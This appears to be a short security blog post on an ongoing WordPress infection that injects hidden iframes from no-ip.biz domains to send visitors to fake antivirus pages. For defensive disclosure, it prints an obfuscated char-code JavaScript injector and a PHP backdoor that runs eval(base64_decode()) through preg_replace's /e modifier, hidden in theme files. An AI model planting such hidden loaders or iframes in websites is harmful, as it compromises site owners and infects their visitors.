Continuing injections from *.no-ip.biz

I don\’t think we have logged about it lately, but an old infection (that started early this year)is still going strong. The result is this code being injected to the site when visited by certain browsers:

var j=0; while(j<230) 
document.write(String.fromCharCode("=tuzmf?/{q8rcbjsci!|!qptjujpo;bctpmvuf<..
!mfgu;.2396qy#{q8rcbjsci#?=jgsbnf!tsd>#iuuq;00..
ifjhiu>#651#?=0jgsbnf?=0ejw?"
.charCodeAt( j++)-1));

And the hidden code that generates it is tricky to find and generlly hidden inside one of the themefiles or wp-includes (on WordPress sites). It looks like this:

function check_image_c()
{
        $imagepath = array (
  0 => "47 118 97 114 47 119 119 119 47 116 104 111 117 103 104 116 102 117 108 119 111 109 101 110 46',
  1 => "111 114 103 47 119 112 45 99 111 110 116 101 110 116 47 117 112 108 111 97 100 115 47 50 48',
  2 => "49 51 47 48 51 47 117 112 97 110 100 117 112 46 106 112 103',
);
...
        $image = "101 118 97 108 40 98 97 115 101 54 52 95 100 101 99 111 100 101 40 39";
        $image = implode("", array_map("chr", explode(" ", $image)));
        $a = 'pre" . 'g_replace';
        $a("/.*/e", $image . $code . "'));", "");
                return false;
}
check_image_c();

All that to the end goal: Inject an iframe from *no-ip.biz (and other free domains) that will redirect the browser of the victim to Fake AV.

Leave a Reply